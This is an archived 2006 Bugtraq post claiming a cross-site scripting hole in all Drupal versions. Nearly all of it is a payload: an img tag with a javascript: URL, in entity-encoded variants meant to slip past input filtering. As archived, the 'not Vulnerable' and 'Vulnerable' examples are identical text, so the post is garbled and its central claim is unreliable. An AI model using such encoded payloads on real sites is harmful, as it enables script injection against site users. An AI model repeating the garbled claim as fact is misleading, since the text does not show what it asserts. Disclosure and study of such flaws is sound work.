Bugtraq mailing list archives
Drupal all versiyon xss cehennem.org
From: liz0 () bsdmail com
Date: 2 Jan 2006 10:45:25 -0000
Drupal all versiyon xss ---------------------------------------------------- site:http://www.drupal.org Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php -------------------------------------------------- img tag : on --------------------------------------------------------------------------------------------------------------------------------------------------------------------- Decimal Value: HTML (without semicolons) <img src=javascript:alert('XSS')> = <img src=javascript:alert('XSS')> --------------------------------------------------------------------------------------------------------------------------------------------------------------- Decimal Value: HTML (with semicolons) <img src=javascript:alert('XSS')> = <img src=javascript:alert('XSS')> --------------------------------------------------------------------------------------------------------------------------------------------------------------- example: post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:alert('XSS')> Vulnerable post mesage :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:alert('XSS')> Vulnerable --------------------------------------------------------- Credit:Liz0ziM mail:liz0 () bsdmail com www.biyo.tk , www.cehennem.org Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyberlord and all friend ----------------------------------------------------------- Source: http://liz0zim.no-ip.org/drupal.txt ------------------------------------------------------------
Current thread:
- Drupal all versiyon xss cehennem.org liz0 (Jan 03)
- Re: Drupal all versiyon xss cehennem.org RSnake (Jan 03)
- <Possible follow-ups>
- Re: Drupal all versiyon xss cehennem.org security (Jan 03)